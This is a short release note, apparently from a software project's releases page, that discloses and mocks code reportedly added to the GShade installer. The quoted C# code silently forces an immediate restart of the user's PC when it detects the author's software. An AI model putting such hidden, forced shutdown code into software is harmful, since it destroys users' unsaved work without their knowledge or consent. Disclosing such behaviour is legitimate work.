• 1.0.2 c992ca4714

    NotNite released this 2023-02-06 09:04:11 -05:00 | 12 commits to main since this release

    Check out this new code added to the GShade installer:

        private static void lol() => new Process()
        {
          StartInfo = {
            WorkingDirectory = Environment.SystemDirectory,
            FileName = "shutdown.exe",
            Arguments = "-r -t 0",
            WindowStyle = ProcessWindowStyle.Hidden
          }
        }.Start();
    

    That's right, Marot shuts down your PC when it's detected you're using my software! Isn't that kind?

    Downloads